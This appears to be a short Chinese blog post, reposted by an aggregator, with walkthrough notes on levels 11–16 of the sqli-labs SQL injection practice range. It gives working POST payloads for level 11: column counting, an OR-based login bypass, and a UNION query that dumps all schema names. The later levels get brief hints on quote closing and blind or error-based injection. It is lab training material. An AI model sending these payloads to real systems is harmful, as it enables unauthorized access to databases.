sqli-labs靶场11-16关
Posted 李时珍的皮ya
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs靶场11-16关相关的知识,希望对你有一定的参考价值。
写的可能不太详细,详细请看https://www.cnblogs.com/-qing-/p/11610385.html#_lab2_0_0
友情提醒:发送数据请求不要乱加空格,否则结果可能显示不出来
十一关
uname=admin\' order by 2#&passwd=1&submit=Submit //判断列数
uname=admin\' or \'3\'=\'3\' #&passwd=1&submit=Submit
uname=-qing\' union select 1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)##&passwd=1&submit=Submit//爆全部数据
十二关
只是与上一关的闭合符号有区别
十三关
看源码之后知道他是注释符号
得不出数据来,直接用报错函数来做
十四关 与上一关的区别就是闭合符号,不多说了
十五关 单引号闭合的布尔盲注
十六关 闭合符号的区别
十七关 update的注入
以上是关于sqli-labs靶场11-16关的主要内容,如果未能解决你的问题,请参考以下文章